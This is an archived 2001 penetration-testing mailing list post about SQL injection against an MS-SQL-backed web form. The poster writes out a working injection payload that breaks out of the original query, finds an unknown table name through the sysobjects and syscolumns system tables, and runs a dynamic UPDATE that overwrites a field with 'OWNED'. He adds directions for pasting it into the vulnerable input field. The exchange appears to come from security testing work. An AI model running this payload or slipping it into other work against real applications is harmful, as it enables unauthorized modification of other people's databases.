Penetration Testing mailing list archives
Re: sql insertion
From: H D Moore <hdm () secureaustin com>
Date: Sun, 27 May 2001 18:09:18 -0500
I know its bad form to answer my own question, but I thought others might find this useful. To update a field in a table without knowing the name of the table, you can do this: _____________________________ # this finishes off the original select bogusdata'; # start the table find TSQL declare @SQLQ NVARCHAR(1024); set @SQLQ = 'UPDATE ' + (select name from sysobjects where id = (select id from syscolumns where name = 'KnownColumn')); # make the query set @SQLQ = @SQLQ + N' SET fname = ''OWNED'' WHERE KnownColumn = ''somevalue'' '; # execute it EXECUTE sp_executesql @SQLQ; # force everything after to a comment -- _____________________________ To actually use the query above, remove all of the # comments and place everything on the same line, then paste it into the form field. The KnownColumn field is one I happened to guess based on the function of the application. There has _got_ to be an easier way to do this, the above method only works if the target table is the only one in the database with that column name. -HD On Saturday 26 May 2001 04:02 pm, H D Moore wrote:
I have a buggy web application which takes an input field and places it in the middle of an SQL query, then executes it against a MS-SQL server. I can rewrite the query because single quotes are used to encapsulate the input field, and the script doesn't strip out the single quote character.
[ snip ]
Is there a way to select the object ID of known column name from the syscolumns metatable, pass that object ID into another subselect against the sysobjects metatable to get the table name, and finally use that table as part of a final query? -HD
Current thread:
- sql insertion H D Moore (May 26)
- Re: sql insertion H D Moore (May 28)